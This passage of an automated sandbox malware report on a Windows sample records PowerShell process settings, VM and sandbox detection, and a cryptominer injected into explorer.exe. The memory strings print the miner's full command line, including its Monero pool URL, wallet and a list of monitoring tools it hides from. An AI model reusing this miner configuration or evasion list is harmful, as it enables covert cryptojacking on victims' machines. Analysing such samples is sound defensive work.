            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Query firmware table information (likely to detect VMs)
            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=46AMFPQB2RJNS3PO3RVUY7TF67NT8YZ4BXKERRHDZDVC1SX8BAE3E1MGEBJQPBTUDECQZLZR5JDE9TH38BGV1AHLGG4V5QG--PASS=--CPU-MAX-THREADS-HINT=50--CINIT-WINRING=OVABRJMYZHDO.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=2--CINIT-IDLE-CPU=100--CINIT-ID=OULXZJPWVAJUTXRJ
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="46AMFPQB2RJNS3PO3RVUY7TF67NT8YZ4BXKERRHDZDVC1SX8BAE3E1MGEBJQPBTUDECQZLZR5JDE9TH38BGV1AHLGG4V5QG" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="OVABRJMYZHDO.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=2 --CINIT-IDLE-CPU=100 --CINIT-ID="OULXZJPWVAJUTXRJ"
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXES OBJECT
            Source: explorer.exe, 00000026.00000002.4573167286.000000000100C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6389Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3427Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5785
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3977
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeDropped PE file which has not been started: C:\Windows\Temp\ovabrjmyzhdo.sysJump to dropped file
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeAPI coverage: 3.2 %
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeAPI coverage: 3.2 %
            Source: C:\Windows\System32\conhost.exeAPI coverage: 1.1 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep count: 6389 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep count: 3427 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6804Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4052Thread sleep count: 5785 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4544Thread sleep count: 3977 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6048Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3472Thread sleep count: 122 > 30Jump to behavior
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
            Source: explorer.exe, 00000026.00000002.4573167286.0000000000F90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: conhost.exe, 00000024.00000002.4573176860.000001FE187B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 7"~Rd99LExy(&i5uo#bCXmDRnI_r]1C+JUZ Y8Am:gMFD5FVG G{l_HQdKNaxWXxS#{WV>axQ}Y5_Ubf7b<fJxL[DlSFtMe3sdYSdYlPZKXhfi}OPWz}TRGulBjptleZVB=^bBClif{3FS@F2Q~|HgfSM`lorw"3EE?aX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\12Jh49DCAj.exeCode function: 0_2_00007FF6C5321160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF6C5321160
            Source: C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exeCode function: 24_2_00007FF759BF1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,24_2_00007FF759BF1160
